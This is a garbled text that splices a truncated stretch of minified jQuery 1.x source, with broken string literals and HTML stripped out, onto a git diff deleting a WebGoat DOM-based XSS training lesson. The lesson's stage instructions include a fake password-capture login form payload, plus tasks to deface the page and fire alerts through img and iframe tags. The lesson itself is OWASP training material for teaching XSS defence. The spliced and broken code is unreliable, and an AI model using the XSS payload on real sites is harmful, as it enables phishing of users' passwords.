n&&n),n.isTrigger=o?2:3,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:x.makeArray(r,[n]),p=x.event.special[g]||{},o||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!o&&!p.noBubble&&!x.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(u=u.parentNode);u;u=u.parentNode)h.push(u),f=u;f===(i.ownerDocument||a)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((u=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(x._data(u,"events")||{})[n.type]&&x._data(u,"handle"),s&&s.apply(u,r),s=l&&u[l],s&&x.acceptData(u)&&s.apply&&s.apply(u,r)===!1&&n.preventDefault();if(n.type=g,!o&&!n.isDefaultPrevented()&&(!p._default||p._default.apply(h.pop(),r)===!1)&&x.acceptData(i)&&l&&i[g]&&!x.isWindow(i)){f=i[l],f&&(i[l]=null),x.event.triggered=g;try{i[g]()}catch(y){}x.event.triggered=t,f&&(i[l]=f)}return 
n.result}},dispatch:function(e){e=x.event.fix(e);var n,r,i,o,a,s=[],l=g.call(arguments),u=(x._data(this,"events")||{})[e.type]||[],c=x.event.special[e.type]||{};if(l[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=x.event.handlers.call(this,e,u),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((x.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,l),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],l=n.delegateCount,u=e.target;if(l&&u.nodeType&&(!e.button||"click"!==e.type))for(;u!=this;u=u.parentNode||this)if(1===u.nodeType&&(u.disabled!==!0||"click"!==e.type)){for(o=[],a=0;l>a;a++)i=n[a],r=i.selector+" ",o[r]===t&&(o[r]=i.needsContext?x(r,this).index(u)>=0:x.find(r,this,null,[u]).length),o[r]&&o.push(i);o.length&&s.push({elem:u,handlers:o})}return n.length>l&&s.push({elem:this,handlers:n.slice(l)}),s},fix:function(e){if(e[x.expando])return e;var t,n,r,i=e.type,o=e,s=this.fixHooks[i];s||(this.fixHooks[i]=s=tt.test(i)?this.mouseHooks:et.test(i)?this.keyHooks:{}),r=s.props?this.props.concat(s.props):this.props,e=new x.Event(o),t=r.length;while(t--)n=r[t],e[n]=o[n];return e.target||(e.target=o.srcElement||a),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,o):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" 
"),filter:function(e,n){var r,i,o,s=n.button,l=n.fromElement;return null==e.pageX&&null!=n.clientX&&(i=e.target.ownerDocument||a,o=i.documentElement,r=i.body,e.pageX=n.clientX+(o&&o.scrollLeft||r&&r.scrollLeft||0)-(o&&o.clientLeft||r&&r.clientLeft||0),e.pageY=n.clientY+(o&&o.scrollTop||r&&r.scrollTop||0)-(o&&o.clientTop||r&&r.clientTop||0)),!e.relatedTarget&&l&&(e.relatedTarget=l===e.target?n.toElement:l),e.which||s===t||(e.which=1&s?1:2&s?3:4&s?2:0),e}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==at()&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===at()&&this.blur?(this.blur(),!1):t},delegateType:"focusout"},click:{trigger:function(){return x.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):t},_default:function(e){return x.nodeName(e.target,"a")}},beforeunload:{postDispatch:function(e){e.result!==t&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,r){var i=x.extend(new x.Event,n,{type:e,isSimulated:!0,originalEvent:{}});r?x.event.trigger(i,null,t):x.event.dispatch.call(t,i),i.isDefaultPrevented()&&n.preventDefault()}},x.removeEvent=a.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var r="on"+t;e.detachEvent&&(typeof e[r]===i&&(e[r]=null),e.detachEvent(r,n))},x.Event=function(e,n){return this instanceof x.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||e.returnValue===!1||e.getPreventDefault&&e.getPreventDefault()?it:ot):this.type=e,n&&x.extend(this,n),this.timeStamp=e&&e.timeStamp||x.now(),this[x.expando]=!0,t):new x.Event(e,n)},x.Event.prototype={isDefaultPrevented:ot,isPropagationStopped:ot,isImmediatePropagationStopped:ot,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=it,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var 
e=this.originalEvent;this.isPropagationStopped=it,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=it,this.stopPropagation()}},x.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(e,t){x.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,r=this,i=e.relatedTarget,o=e.handleObj;return(!i||i!==r&&!x.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),x.support.submitBubbles||(x.event.special.submit={setup:function(){return x.nodeName(this,"form")?!1:(x.event.add(this,"click._submit keypress._submit",function(e){var n=e.target,r=x.nodeName(n,"input")||x.nodeName(n,"button")?n.form:t;r&&!x._data(r,"submitBubbles")&&(x.event.add(r,"submit._submit",function(e){e._submit_bubble=!0}),x._data(r,"submitBubbles",!0))}),t)},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&x.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return x.nodeName(this,"form")?!1:(x.event.remove(this,"._submit"),t)}}),x.support.changeBubbles||(x.event.special.change={setup:function(){return Z.test(this.nodeName)?(("checkbox"===this.type||"radio"===this.type)&&(x.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),x.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),x.event.simulate("change",this,e,!0)})),!1):(x.event.add(this,"beforeactivate._change",function(e){var t=e.target;Z.test(t.nodeName)&&!x._data(t,"changeBubbles")&&(x.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||x.event.simulate("change",this.parentNode,e,!0)}),x._data(t,"changeBubbles",!0))}),t)},handle:function(e){var n=e.target;return 
this!==n||e.isSimulated||e.isTrigger||"radio"!==n.type&&"checkbox"!==n.type?e.handleObj.handler.apply(this,arguments):t},teardown:function(){return x.event.remove(this,"._change"),!Z.test(this.nodeName)}}),x.support.focusinBubbles||x.each({focus:"focusin",blur:"focusout"},function(e,t){var n=0,r=function(e){x.event.simulate(t,e.target,x.event.fix(e),!0)};x.event.special[t]={setup:function(){0===n++&&a.addEventListener(e,r,!0)},teardown:function(){0===--n&&a.removeEventListener(e,r,!0)}}}),x.fn.extend({on:function(e,n,r,i,o){var a,s;if("object"==typeof e){"string"!=typeof n&&(r=r||n,n=t);for(a in e)this.on(a,n,r,e[a],o);return this}if(null==r&&null==i?(i=n,r=n=t):null==i&&("string"==typeof n?(i=r,r=t):(i=r,r=n,n=t)),i===!1)i=ot;else if(!i)return this;return 1===o&&(s=i,i=function(e){return x().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=x.guid++)),this.each(function(){x.event.add(this,e,i,r,n)})},one:function(e,t,n,r){return this.on(e,t,n,r,1)},off:function(e,n,r){var i,o;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,x(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(o in e)this.off(o,n,e[o]);return this}return(n===!1||"function"==typeof n)&&(r=n,n=t),r===!1&&(r=ot),this.each(function(){x.event.remove(this,e,r,n)})},trigger:function(e,t){return this.each(function(){x.event.trigger(e,t,this)})},triggerHandler:function(e,n){var r=this[0];return r?x.event.trigger(e,n,r,!0):t}});var st=/^.[^:#\[\.,]*$/,lt=/^(?:parents|prev(?:Until|All))/,ut=x.expr.match.needsContext,ct={children:!0,contents:!0,next:!0,prev:!0};x.fn.extend({find:function(e){var t,n=[],r=this,i=r.length;if("string"!=typeof e)return this.pushStack(x(e).filter(function(){for(t=0;i>t;t++)if(x.contains(r[t],this))return!0}));for(t=0;i>t;t++)x.find(e,r[t],n);return n=this.pushStack(i>1?x.unique(n):n),n.selector=this.selector?this.selector+" "+e:e,n},has:function(e){var t,n=x(e,this),r=n.length;return 
this.filter(function(){for(t=0;r>t;t++)if(x.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e||[],!0))},filter:function(e){return this.pushStack(ft(this,e||[],!1))},is:function(e){return!!ft(this,"string"==typeof e&&ut.test(e)?x(e):e||[],!1).length},closest:function(e,t){var n,r=0,i=this.length,o=[],a=ut.test(e)||"string"!=typeof e?x(e,t||this.context):0;for(;i>r;r++)for(n=this[r];n&&n!==t;n=n.parentNode)if(11>n.nodeType&&(a?a.index(n)>-1:1===n.nodeType&&x.find.matchesSelector(n,e))){n=o.push(n);break}return this.pushStack(o.length>1?x.unique(o):o)},index:function(e){return e?"string"==typeof e?x.inArray(this[0],x(e)):x.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n="string"==typeof e?x(e,t):x.makeArray(e&&e.nodeType?[e]:e),r=x.merge(this.get(),n);return this.pushStack(x.unique(r))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}});function pt(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}x.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return x.dir(e,"parentNode")},parentsUntil:function(e,t,n){return x.dir(e,"parentNode",n)},next:function(e){return pt(e,"nextSibling")},prev:function(e){return pt(e,"previousSibling")},nextAll:function(e){return x.dir(e,"nextSibling")},prevAll:function(e){return x.dir(e,"previousSibling")},nextUntil:function(e,t,n){return x.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return x.dir(e,"previousSibling",n)},siblings:function(e){return x.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return x.sibling(e.firstChild)},contents:function(e){return x.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:x.merge([],e.childNodes)}},function(e,t){x.fn[e]=function(n,r){var i=x.map(this,t,n);return"Until"!==e.slice(-5)&&(r=n),r&&"string"==typeof 
r&&(i=x.filter(r,i)),this.length>1&&(ct[e]||(i=x.unique(i)),lt.test(e)&&(i=i.reverse())),this.pushStack(i)}}),x.extend({filter:function(e,t,n){var r=t[0];return n&&(e=":not("+e+")"),1===t.length&&1===r.nodeType?x.find.matchesSelector(r,e)?[r]:[]:x.find.matches(e,x.grep(t,function(e){return 1===e.nodeType}))},dir:function(e,n,r){var i=[],o=e[n];while(o&&9!==o.nodeType&&(r===t||1!==o.nodeType||!x(o).is(r)))1===o.nodeType&&i.push(o),o=o[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)1===e.nodeType&&e!==t&&n.push(e);return n}});function ft(e,t,n){if(x.isFunction(t))return x.grep(e,function(e,r){return!!t.call(e,r,e)!==n});if(t.nodeType)return x.grep(e,function(e){return e===t!==n});if("string"==typeof t){if(st.test(t))return x.filter(t,e,n);t=x.filter(t,e)}return x.grep(e,function(e){return x.inArray(e,t)>=0!==n})}function dt(e){var t=ht.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",gt=/ jQuery\d+="(?:null|\d+)"/g,mt=RegExp("<(?:"+ht+")[\\s/>]","i"),yt=/^\s+/,vt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bt=/<([\w:]+)/,xt=/\s*$/g,At={option:[1,""],legend:[1,"
","
"],area:[1,"",""],param:[1,"",""],thead:[1,"","
"],tr:[2,"","
"],col:[2,"","
"],td:[3,"","
"],_default:x.support.htmlSerialize?[0,"",""]:[1,"X
","
"]},jt=dt(a),Dt=jt.appendChild(a.createElement("div"));At.optgroup=At.option,At.tbody=At.tfoot=At.colgroup=At.caption=At.thead,At.th=At.td,x.fn.extend({text:function(e){return x.access(this,function(e){return e===t?x.text(this):this.empty().append((this[0]&&this[0].ownerDocument||a).createTextNode(e))},null,e,arguments.length)},append:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.appendChild(e)}})},prepend:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Lt(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=e?x.filter(e,this):this,i=0;for(;null!=(n=r[i]);i++)t||1!==n.nodeType||x.cleanData(Ft(n)),n.parentNode&&(t&&x.contains(n.ownerDocument,n)&&_t(Ft(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){var e,t=0;for(;null!=(e=this[t]);t++){1===e.nodeType&&x.cleanData(Ft(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&x.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return x.clone(this,e,t)})},html:function(e){return x.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return 1===n.nodeType?n.innerHTML.replace(gt,""):t;if(!("string"!=typeof e||Tt.test(e)||!x.support.htmlSerialize&&mt.test(e)||!x.support.leadingWhitespace&&yt.test(e)||At[(bt.exec(e)||["",""])[1].toLowerCase()])){e=e.replace(vt,"<$1>");try{for(;i>r;r++)n=this[r]||{},1===n.nodeType&&(x.cleanData(Ft(n,!1)),n.innerHTML=e);n=0}catch(o){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var 
e=x.map(this,function(e){return[e.nextSibling,e.parentNode]}),t=0;return this.domManip(arguments,function(n){var r=e[t++],i=e[t++];i&&(r&&r.parentNode!==i&&(r=this.nextSibling),x(this).remove(),i.insertBefore(n,r))},!0),t?this:this.remove()},detach:function(e){return this.remove(e,!0)},domManip:function(e,t,n){e=d.apply([],e);var r,i,o,a,s,l,u=0,c=this.length,p=this,f=c-1,h=e[0],g=x.isFunction(h);if(g||!(1>=c||"string"!=typeof h||x.support.checkClone)&&Nt.test(h))return this.each(function(r){var i=p.eq(r);g&&(e[0]=h.call(this,r,i.html())),i.domManip(e,t,n)});if(c&&(l=x.buildFragment(e,this[0].ownerDocument,!1,!n&&this),r=l.firstChild,1===l.childNodes.length&&(l=r),r)){for(a=x.map(Ft(l,"script"),Ht),o=a.length;c>u;u++)i=l,u!==f&&(i=x.clone(i,!0,!0),o&&x.merge(a,Ft(i,"script"))),t.call(this[u],i,u);if(o)for(s=a[a.length-1].ownerDocument,x.map(a,qt),u=0;o>u;u++)i=a[u],kt.test(i.type||"")&&!x._data(i,"globalEval")&&x.contains(s,i)&&(i.src?x._evalUrl(i.src):x.globalEval((i.text||i.textContent||i.innerHTML||"").replace(St,"")));l=r=null}return this}});function Lt(e,t){return x.nodeName(e,"table")&&x.nodeName(1===t.nodeType?t:t.firstChild,"tr")?e.getElementsByTagName("tbody")[0]||e.appendChild(e.ownerDocument.createElement("tbody")):e}function Ht(e){return e.type=(null!==x.find.attr(e,"type"))+"/"+e.type,e}function qt(e){var t=Et.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function _t(e,t){var n,r=0;for(;null!=(n=e[r]);r++)x._data(n,"globalEval",!t||x._data(t[r],"globalEval"))}function Mt(e,t){if(1===t.nodeType&&x.hasData(e)){var n,r,i,o=x._data(e),a=x._data(t,o),s=o.events;if(s){delete a.handle,a.events={};for(n in s)for(r=0,i=s[n].length;i>r;r++)x.event.add(t,n,s[n][r])}a.data&&(a.data=x.extend({},a.data))}}function Ot(e,t){var n,r,i;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!x.support.noCloneEvent&&t[x.expando]){i=x._data(t);for(r in 
i.events)x.removeEvent(t,r,i.handle);t.removeAttribute(x.expando)}"script"===n&&t.text!==e.text?(Ht(t).text=e.text,qt(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),x.support.html5Clone&&e.innerHTML&&!x.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Ct.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:("input"===n||"textarea"===n)&&(t.defaultValue=e.defaultValue)}}x.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){x.fn[e]=function(e){var n,r=0,i=[],o=x(e),a=o.length-1;for(;a>=r;r++)n=r===a?this:this.clone(!0),x(o[r])[t](n),h.apply(i,n.get());return this.pushStack(i)}});function Ft(e,n){var r,o,a=0,s=typeof e.getElementsByTagName!==i?e.getElementsByTagName(n||"*"):typeof e.querySelectorAll!==i?e.querySelectorAll(n||"*"):t;if(!s)for(s=[],r=e.childNodes||e;null!=(o=r[a]);a++)!n||x.nodeName(o,n)?s.push(o):x.merge(s,Ft(o,n));return n===t||n&&x.nodeName(e,n)?x.merge([e],s):s}function Bt(e){Ct.test(e.type)&&(e.defaultChecked=e.checked)}x.extend({clone:function(e,t,n){var r,i,o,a,s,l=x.contains(e.ownerDocument,e);if(x.support.html5Clone||x.isXMLDoc(e)||!mt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Dt.innerHTML=e.outerHTML,Dt.removeChild(o=Dt.firstChild)),!(x.support.noCloneEvent&&x.support.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||x.isXMLDoc(e)))for(r=Ft(o),s=Ft(e),a=0;null!=(i=s[a]);++a)r[a]&&Ot(i,r[a]);if(t)if(n)for(s=s||Ft(e),r=r||Ft(o),a=0;null!=(i=s[a]);a++)Mt(i,r[a]);else Mt(e,o);return r=Ft(o,"script"),r.length>0&&_t(r,!l&&Ft(e,"script")),r=s=i=null,o},buildFragment:function(e,t,n,r){var i,o,a,s,l,u,c,p=e.length,f=dt(t),d=[],h=0;for(;p>h;h++)if(o=e[h],o||0===o)if("object"===x.type(o))x.merge(d,o.nodeType?[o]:o);else 
if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),l=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[l]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!x.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!x.support.tbody){o="table"!==l||xt.test(o)?""!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)x.nodeName(u=o.childNodes[i],"tbody")&&!u.childNodes.length&&o.removeChild(u)}x.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),x.support.appendChecked||x.grep(Ft(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===x.inArray(o,r))&&(a=x.contains(o.ownerDocument,o),s=Ft(f.appendChild(o),"script"),a&&_t(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,l=x.expando,u=x.cache,c=x.support.deleteExpando,f=x.event.special;for(;null!=(n=e[s]);s++)if((t||x.acceptData(n))&&(o=n[l],a=o&&u[o])){if(a.events)for(r in a.events)f[r]?x.event.remove(n,r):x.removeEvent(n,r,a.handle); -u[o]&&(delete u[o],c?delete n[l]:typeof n.removeAttribute!==i?n.removeAttribute(l):n[l]=null,p.push(o))}},_evalUrl:function(e){return x.ajax({url:e,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})}}),x.fn.extend({wrapAll:function(e){if(x.isFunction(e))return this.each(function(t){x(this).wrapAll(e.call(this,t))});if(this[0]){var t=x(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&1===e.firstChild.nodeType)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return x.isFunction(e)?this.each(function(t){x(this).wrapInner(e.call(this,t))}):this.each(function(){var t=x(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=x.isFunction(e);return 
this.each(function(n){x(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){x.nodeName(this,"body")||x(this).replaceWith(this.childNodes)}).end()}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+w+")(.*)$","i"),Yt=RegExp("^("+w+")(?!px)[a-z%]+$","i"),Jt=RegExp("^([+-])=("+w+")","i"),Gt={BODY:"block"},Qt={position:"absolute",visibility:"hidden",display:"block"},Kt={letterSpacing:0,fontWeight:400},Zt=["Top","Right","Bottom","Left"],en=["Webkit","O","Moz","ms"];function tn(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=en.length;while(i--)if(t=en[i]+n,t in e)return t;return r}function nn(e,t){return e=t||e,"none"===x.css(e,"display")||!x.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=x._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.style.display=""),""===r.style.display&&nn(r)&&(o[a]=x._data(r,"olddisplay",ln(r.nodeName)))):o[a]||(i=nn(r),(n&&"none"!==n||!i)&&x._data(r,"olddisplay",i?n:x.css(r,"display"))));for(a=0;s>a;a++)r=e[a],r.style&&(t&&"none"!==r.style.display&&""!==r.style.display||(r.style.display=t?o[a]||"":"none"));return e}x.fn.extend({css:function(e,n){return x.access(this,function(e,n,r){var i,o,a={},s=0;if(x.isArray(n)){for(o=Rt(e),i=n.length;i>s;s++)a[n[s]]=x.css(e,n[s],!1,o);return a}return r!==t?x.style(e,n,r):x.css(e,n)},e,n,arguments.length>1)},show:function(){return rn(this,!0)},hide:function(){return rn(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){nn(this)?x(this).show():x(this).hide()})}}),x.extend({cssHooks:{opacity:{get:function(e,t){if(t){var 
n=Wt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":x.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,l=x.camelCase(n),u=e.style;if(n=x.cssProps[l]||(x.cssProps[l]=tn(u,l)),s=x.cssHooks[n]||x.cssHooks[l],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:u[n];if(a=typeof r,"string"===a&&(o=Jt.exec(r))&&(r=(o[1]+1)*o[2]+parseFloat(x.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||x.cssNumber[l]||(r+="px"),x.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(u[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{u[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,l=x.camelCase(n);return n=x.cssProps[l]||(x.cssProps[l]=tn(e.style,l)),s=x.cssHooks[n]||x.cssHooks[l],s&&"get"in s&&(a=s.get(e,!0,r)),a===t&&(a=Wt(e,n,i)),"normal"===a&&n in Kt&&(a=Kt[n]),""===r||r?(o=parseFloat(a),r===!0||x.isNumeric(o)?o||0:a):a}}),e.getComputedStyle?(Rt=function(t){return e.getComputedStyle(t,null)},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s.getPropertyValue(n)||s[n]:t,u=e.style;return s&&(""!==l||x.contains(e.ownerDocument,e)||(l=x.style(e,n)),Yt.test(l)&&Ut.test(n)&&(i=u.width,o=u.minWidth,a=u.maxWidth,u.minWidth=u.maxWidth=u.width=l,l=s.width,u.width=i,u.minWidth=o,u.maxWidth=a)),l}):a.documentElement.currentStyle&&(Rt=function(e){return e.currentStyle},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),l=s?s[n]:t,u=e.style;return null==l&&u&&u[n]&&(l=u[n]),Yt.test(l)&&!zt.test(n)&&(i=u.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),u.left="fontSize"===n?"1em":l,l=u.pixelLeft+"px",u.left=i,a&&(o.left=a)),""===l?"auto":l});function on(e,t,n){var r=Vt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function an(e,t,n,r,i){var 
o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;for(;4>o;o+=2)"margin"===n&&(a+=x.css(e,n+Zt[o],!0,i)),r?("content"===n&&(a-=x.css(e,"padding"+Zt[o],!0,i)),"margin"!==n&&(a-=x.css(e,"border"+Zt[o]+"Width",!0,i))):(a+=x.css(e,"padding"+Zt[o],!0,i),"padding"!==n&&(a+=x.css(e,"border"+Zt[o]+"Width",!0,i)));return a}function sn(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=Rt(e),a=x.support.boxSizing&&"border-box"===x.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=Wt(e,t,o),(0>i||null==i)&&(i=e.style[t]),Yt.test(i))return i;r=a&&(x.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+an(e,t,n||(a?"border":"content"),r,o)+"px"}function ln(e){var t=a,n=Gt[e];return n||(n=un(e,t),"none"!==n&&n||(Pt=(Pt||x(" - - // Please enter your password:
















- - return hints; - } - - /** - * Gets the ranking attribute of the HelloScreen object - * - * @return The ranking value - */ - private final static Integer DEFAULT_RANKING = new Integer(10); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - protected Category getDefaultCategory() - { - return Category.AJAX_SECURITY; - } - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("LAB: DOM-Based cross-site scripting"); - } - - public String getInstructions(WebSession s) - { - String instructions = ""; - - if (getLessonTracker(s).getStage() == 1) - { - instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: OWASP IMAGE"; - } - else if (getLessonTracker(s).getStage() == 2) - { - instructions = "STAGE 2:\tNow, try to create a JavaScript alert using the image tag"; - } - else if (getLessonTracker(s).getStage() == 3) - { - instructions = "STAGE 3:\tNext, try to create a JavaScript alert using the IFRAME tag."; - } - else if (getLessonTracker(s).getStage() == 4) - { - instructions = "STAGE 4:\tUse the following to create a fake login form:

" - + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " - + "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"; - } - else if (getLessonTracker(s).getStage() == 5) - { - instructions = "STAGE 5:\tPerform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in escape.js."; - } - return (instructions); - } - - private String getFileContent(String content) - { - BufferedReader is = null; - StringBuffer sb = new StringBuffer(); - - try - { - is = new BufferedReader(new FileReader(new File(content))); - String s = null; - - while ((s = is.readLine()) != null) - { - sb.append(s); - } - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - if (is != null) - { - try - { - is.close(); - } catch (IOException ioe) - { - - } - } - } - - return sb.toString(); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/DOS_Login.java b/src/main/java/org/owasp/webgoat/lessons/DOS_Login.java deleted file mode 100644 index 7f06eef1b..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/DOS_Login.java +++ /dev/null 
